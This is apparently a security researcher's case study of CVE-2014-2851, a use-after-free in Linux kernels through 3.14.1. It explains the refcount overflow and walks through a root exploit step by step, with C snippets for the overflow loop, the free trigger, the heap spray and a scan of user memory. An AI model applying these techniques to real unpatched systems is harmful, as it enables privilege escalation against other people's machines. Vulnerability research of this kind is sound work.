This is a case study for the use-after-free vulnerability which was assigned CVE-2014-2851 and affected Linux kernels through 3.14.1. First of all, I'd like to thank Thomas for his help and the original write-upand his GitHub PoC.
This bug might not be very practical (it takes a while to overflow a 32-bit integer) but it was an interesting vulnerability from an exploitation point of view. On our test system, the overall runtime to get # was just over 50 minutes :) There is a certain amount of indeterminism caused by RCU callbacks which makes the exploitation more difficult.
Our test system was 32-bit Ubuntu 14.04 LTS (3.13.0-24-generic kernel) SMP. First, we will describe the vulnerability and walk through its exploitation. We will then discuss the challenges encountered in exploiting this bug.
The vulnerable path shown below is reached when an ICMP socket is created. Note that even though standard users (on most Linux distributions) are not allowed to create ICMP sockets, no root privileges are required to reach the vulnerable code:
int ping_init_sock(struct sock *sk) { struct net *net = sock_net(sk); kgid_t group = current_egid(); struct group_info *group_info = get_current_groups(); [1] int i, j, count = group_info->ngroups; kgid_t low, high; inet_get_ping_group_range_net(net, &low, &high); if (gid_lte(low, group) && gid_lte(group, high)) [2] return 0; ...
The above path ([1] in particular) is reached when an ICMP socket is created in user space:
socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
The get_current_groups()
function in [1] is defined as a macro in include/linux/cred.h
:
#define get_current_groups() \ ({ \ struct group_info *__groups; \ const struct cred *__cred; \ __cred = current_cred(); \ __groups = get_group_info(__cred->group_info); \ [3] __groups; \ })
In [3], the get_group_info()
function atomically increments the group_info
usage counter which is defined as a signed integer:
type = struct group_info { atomic_t usage; int ngroups; int nblocks; kgid_t small_block[32]; kgid_t *blocks[]; } typedef struct { int counter; } atomic_t;
Every time a new ICMP socket is created, the usage counter is incremented by one in [1]. However, for an unprivileged user, the check at [2] will fail (returning 0). Hence, the usage counter is never decremented in this exit path. We can repeatedly create new ICMP sockets overflowing this signed integer (0xffffffff + 1 = 0).
The group_info
structure is shared among forked children processes. When the group usage counter becomes 0, there are a number of paths in the kernel that may free it. One such path discovered by Thomas is the faccessat()
syscall:
SYSCALL_DEFINE3(faccessat, int, dfd, const char __user *, filename, int, mode) { const struct cred *old_cred; struct cred *override_cred; int res; ... override_cred = prepare_creds(); [4] ... out: revert_creds(old_cred); put_cred(override_cred); [5] return res;
In [4], a new struct cred
is allocated and its usage counter (not to be confused with group_info->usage
) is set to 1 and group_info->usage
counter is incremented by 1. The put_cred
in [5] then decrements the cred->usage
counter and calls __put_cred()
:
static inline void put_cred(const struct cred *_cred) { struct cred *cred = (struct cred *) _cred; validate_creds(cred); if (atomic_dec_and_test(&(cred)->usage)) __put_cred(cred); }
An important part is that freeing the cred
struct is implemented via RCU[6]:
void __put_cred(struct cred *cred) { ... BUG_ON(cred == current->cred); BUG_ON(cred == current->real_cred); call_rcu(&cred->rcu, put_cred_rcu); [6] } EXPORT_SYMBOL(__put_cred);
The following shows the put_cred_rcu
callback function, which in turn calls put_group_info()
in [7] to free the group_info
struct when its usage counter becomes 0:
static void put_cred_rcu(struct rcu_head *rcu) { struct cred *cred = container_of(rcu, struct cred, rcu); ... security_cred_free(cred); key_put(cred->session_keyring); key_put(cred->process_keyring); key_put(cred->thread_keyring); key_put(cred->request_key_auth); if (cred->group_info) put_group_info(cred->group_info); [7] free_uid(cred->user); put_user_ns(cred->user_ns); kmem_cache_free(cred_jar, cred); }
The put_group_info()
function is defined as a macro that decrements the group_info
usage counter and if it reaches 0, frees the allocated structure:
#define put_group_info(group_info) \ do { \ if (atomic_dec_and_test(&(group_info)->usage)) \ groups_free(group_info); \ } while (0)
It should be obvious by now that it is possible to free the group_info
struct by overflowing its usage counter to 0 and then calling faccessat()
from user space:
// increment the counter close to 0xffffffff (-10 = 0xfffffff6) for (i = 0; i < -10; i++) { socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP); } // increment the counter by 1 and try to free it for (i = 0; i < 100; i++) { socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP); faccessat(0, "/", R_OK, AT_EACCESS); }
The above code should overflow the usage counter and free the group_info
struct. Since freeing this structure is implemented as an RCU call, there is a certain amount of indeterminism involved which is discussed later in the "Challenges" section.
Once the group_info
struct is freed, the SLUB allocator will link it in to the freelist. There are a number of good resources online describing the implementation of the SLUB allocator and we are not going to discuss it here. It is sufficient to note that when an object is freed, it is put in the freelist and its first 4 bytes (32-bit architecture) are overwritten with a pointer to the next free object in the slab. Hence, the first 4 bytes of the group_info
will get overwritten with a valid kernel memory address. These first 4 bytes represent the usage counter and we may still increment this pointer by creating ICMP sockets.
There are two possible scenarios when group_info
is freed:
- It is the last object in the freelist
- It is one of the free objects in the freelist
In the former case, the "next" free object pointer of our freed group_info
will be set to NULL. We will concentrate on the latter case, where this pointer is set to next free object in the slab (this was the most common case).
On our test system, the group_info
struct is 140 bytes in size and is allocated in the generic kmalloc-192
cache. When a request to allocate an object of size 128-192 bytes is received (via kmalloc, kmem_cache_alloc, etc.), the SLUB allocator will traverse the freelist and allocate memory at the address where our overwritten "usage" counter points to.
It is possible to "point" this address to user space, by incrementing the usage counter again and overflowing it so it points to some user-space address that we can mmap. For example, given a kernel address 0xf3XXXXXX, adding 0xfffffff results in a user-space address 0x3XXXXXX that we can mmap. In summary, the exploitation procedure can be described as follows:
- Increment the
group_info
usage counter close to 0xffffffff by creating ICMP sockets - Increment the usage counter by 1 and try to free
group_info
viafaccessat()
&& repeat - Once it is freed, the usage counter in
group_info
will be overwritten with a valid kernel memory address pointing to the next free object in the slab - Keep incrementing the
group_info
usage counter (by creating more ICMP sockets) until it points to some user-space memory address - Map this region (e.g., 0x3000000-0x4000000) in user space and memset it to 0
- Start allocating structure X (ideally containing function pointers) in kernel space that has the size 128-192 bytes
- The SLUB allocator will allocate this structure X at our user-space address in range 0x3000000-0x4000000
- If the structure X contains any function pointers, we can point these to our payload (ROP chain in our case)
The structure X used in our exploit is the struct file
, which has the same size as group_info
and contains a few function pointers (e.g., file operations *f_op
or to be more precise, a pointer to struct containing function pointers). The file
structs can be allocated, for example, using the following code:
for (i = 0; i < N; i++) fd = open("/etc/passwd", O_RDONLY);
If more than 1024 file descriptors are required, you can always fork another process and allocate more file
structs.
Once this file
struct is allocated in our user-space range 0x3000000-0x4000000, we can simply search this memory range for the first non-zero byte. This will be the beginning of our file
struct:
unsigned *p; struct file *f = NULL; // find the file struct for (p = 0x3000000; p < 0x4000000; p++) { if (*p) { f = (struct file *)p; break; } }
From this point onward, the rest of the exploitation procedure is quite trivial.
As mentioned in the "Exploitation" section, there is a certain amount of indeterminism caused by RCU callbacks. For example, ping_init_sock()
followed by faccessat()
in a loop may not be performed in that order. Ideally, we want the following order:
- Increment the
group_info
usage counter - Check if the counter is 0 and free it via
faccessat()
However, the RCU callbacks are often accumulated and executed in batches. The callback function "is called after all the CPUs in the system have gone through at least one "quiescent" state (such as context switch, idle loop, or user code).". Hence, it is often the case that a number of ping_init_sock
are executed (overflowing the counter and incrementing it to > 0), followed by a number of RCU callbacks to put_cred_rcu()
. This results in the group_info
freeing path being skipped. However, we have found a way to order the aforementioned events of incrementing and checking the usage counter.
Another issue encountered while exploiting this vulnerability is related to the recovery phase. What would happen if another object is requested from the same slab? In this case, we can always set the "next" freelist pointer of our object to NULL. The allocator will then set the freelist pointer to NULL, which in turn, will force the allocator to create a new slab and "forget" about the current slab.
Now what if some object belonging to this particular slab is freed? This presented a real challenge and was implemented as a post-exploitation LKM to fixate the system.
In terms of practicality, this particular vulnerability is probably not ideal since it takes a while to overflow the 32-bit usage counter :) On our test system, the overall exploitation time was just over 50 minutes! However, it is quite reliable (even on SMP platforms) once group_info
is freed.